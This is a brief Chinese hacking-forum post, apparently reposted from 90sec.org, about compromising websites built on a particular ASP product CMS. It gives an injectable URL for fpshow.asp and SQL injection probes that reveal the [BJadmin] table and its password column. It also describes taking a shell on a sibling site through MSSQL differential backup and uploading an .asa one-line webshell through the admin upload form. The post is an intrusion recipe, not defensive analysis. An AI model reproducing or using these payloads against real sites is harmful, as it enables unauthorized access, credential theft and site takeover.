By    老鬼    首发:90sec.org

用这程序的都是百度推广站。目标A站有注入点,搞不到表名。各种蛋痛的跳过,找了同程序的B站 旁了个站mssql差异备份拿到了同程序的B站shell。。down了程序。找到了表名。注入进后台拿到A站权限。目的达到。

注入文件:

news_detail.asp

fpshow.asp?Product_ParentID=4&Product_ID=31;--   注入漏洞

and exists(select * from [BJadmin])   表名

and exists(select [password] from [BJadmin])       用户名是title这个字段里面

手工猜字段麻烦 用工具吧。

shell拿 就在后台 上传的地方传个 asa的图片一句话

转自:http://www.90sec.org/viewthread.php?tid=2446&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000